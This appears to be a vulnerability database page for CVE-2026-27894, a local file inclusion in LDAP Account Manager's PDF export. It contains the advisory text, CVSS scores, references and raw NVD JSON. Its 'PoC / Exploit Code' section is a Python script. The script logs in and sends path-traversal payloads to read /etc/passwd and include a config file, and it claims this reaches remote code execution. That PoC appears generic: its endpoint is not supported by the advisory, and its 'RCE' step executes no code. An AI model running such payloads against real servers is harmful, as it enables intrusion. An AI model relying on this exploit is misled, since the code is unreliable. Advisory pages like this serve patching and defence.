CVE-2026-27894

Description

LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, a local file inclusion was detected in the PDF export that allows users to include local PHP files and this way execute code. In combination with GHSA-88hf-2cjm-m9g8 this allows to execute arbitrary code. Users need to login to LAM to exploit this vulnerability. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user and delete the PDF profile files (making PDF exports impossible).

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* - VULNERABLE

LDAP Account Manager (LAM) < 9.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-27894 PoC - LDAP Account Manager LFI
# This PoC demonstrates local file inclusion in PDF export module

TARGET_URL = "http://target-server/lam"
USERNAME = "attacker"
PASSWORD = "password"

def exploit_lfi():
    """
    Exploit CVE-2026-27894: Local File Inclusion in PDF export
    Requires authenticated session to LAM
    """
    session = requests.Session()
    
    # Step 1: Authenticate to LAM
    login_url = f"{TARGET_URL}/login.php"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Exploit LFI via PDF export module
    # Path traversal to include local PHP files
    lfi_payload = "../../../../etc/passwd"
    exploit_url = f"{TARGET_URL}/pdf.php?module=export&file={lfi_payload}"
    
    response = session.get(exploit_url)
    print(f"Status Code: {response.status_code}")
    print(f"Response Length: {len(response.content)}")
    
    # To achieve RCE, combine with GHSA-88hf-2cjm-m9g8
    # Include PHP file that triggers code execution
    rce_payload = "../../../../var/lib/ldap-account-manager/config/config.php"
    rce_url = f"{TARGET_URL}/pdf.php?module=export&file={rce_payload}"
    
    rce_response = session.get(rce_url)
    print(f"RCE Payload Response: {rce_response.text[:500]}")

if __name__ == "__main__":
    exploit_lfi()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27894
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27894
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27894/
[4] VulDB https://vuldb.com/cve/CVE-2026-27894
[5] https://github.com/LDAPAccountManager/lam/releases/tag/9.5
[6] https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-88hf-2cjm-m9g8
[7] https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-w7xq-vjr3-p9cf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27894", "sourceIdentifier": "[email protected]", "published": "2026-03-18T00:16:19.607", "lastModified": "2026-03-23T18:03:22.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, a local file inclusion was detected in the PDF export that allows users to include local PHP files and this way execute code. In combination with GHSA-88hf-2cjm-m9g8 this allows to execute arbitrary code. Users need to login to LAM to exploit this vulnerability. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user and delete the PDF profile files (making PDF exports impossible)."}, {"lang": "es", "value": "LDAP Account Manager (LAM) es una interfaz web para gestionar entradas (p. ej., usuarios, grupos, configuraciones DHCP) almacenadas en un directorio LDAP. Antes de la versión 9.5, se detectó una inclusión local de ficheros en la exportación de PDF que permite a los usuarios incluir ficheros PHP locales y de esta manera ejecutar código. En combinación con GHSA-88hf-2cjm-m9g8, esto permite ejecutar código arbitrario. Los usuarios deben iniciar sesión en LAM para explotar esta vulnerabilidad. La versión 9.5 soluciona el problema. Aunque se recomienda la actualización, una solución alternativa sería hacer que /var/lib/ldap-account-manager/config sea de solo lectura para el usuario del servidor web y eliminar los ficheros de perfil de PDF (haciendo imposibles las exportaciones de PDF)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.5", "matchCriteriaId": "27FD6BBA-5705-4452-8B86-E03926E85E19"}]}]}], "references": [{"url": "https://github.com/LDAPAccountManager/lam/releases/tag/9.5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-88hf-2cjm-m9g8", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-w7xq-vjr3-p9cf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}